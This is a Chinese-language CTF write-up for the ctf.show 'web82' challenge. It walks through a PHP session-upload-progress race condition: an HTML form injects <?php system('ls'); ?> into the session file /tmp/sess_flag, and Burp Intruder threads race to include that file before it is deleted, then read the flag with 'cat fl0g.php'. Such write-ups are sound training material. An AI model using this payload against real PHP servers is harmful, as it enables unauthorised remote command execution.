web82
查看提示,这一题要用到环境竞争,要通过session进行文件包含得到flag。
例如在cookie中设置PHPSESSID(即session 的值)=flag,那么会在服务器上创建一个/tmp/sess_flag文件,对于默认配置,文件内容上传后会被清除,那么我们需要进行环境竞争,在删除之前,对该文件进行文件包含,从而进行命令执行。
方法一
首先我们需要编写以下html脚本,进行临时文件上传,上传文件的同时传入一个参数及其值:PHP_SESSION_UPLOAD_PROGRESS=<?php system('ls'); ?>,这样达到恶意代码的上传,进而执行命令。 注:记得修改url为你做题的网址
<!DOCTYPE html>
<html>
<body>
<form action="https://04485255-5dd1-4cb0-a34a-e59b3e194b81.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
随意上传一个文件
用bp进行抓包,可以看见我们想要执行的命令和文件已经上传
然后在cookie后面添加PHPSESSID=flag,以生成sess_flag文件:
再进行环境竞争的线程设置:
不涉及爆破,需要清除$,点击右侧的clear $:
此处设置 null payload 以及 continue indefinitely
新建一个资源池,设置线程为30
点击开始攻击,由此能不断的上传刚刚的文件,继续尝试在删除前进行文件包含
然后再进行文件抓包,针对我们上传的文件 /tmp/sess_flag
以下还是相同设置,不停的访问文件
访问包的线程数需要大于上传包的线程数:
一边上传一边访问文件,由于访问文件比上传快,所以更能成功。
可见长度与其他不同,点击查看回显结果,得到文件名:fl0g.php
再用相同方法修改为 cat fl0g.php ,再进行环境竞争,得到flag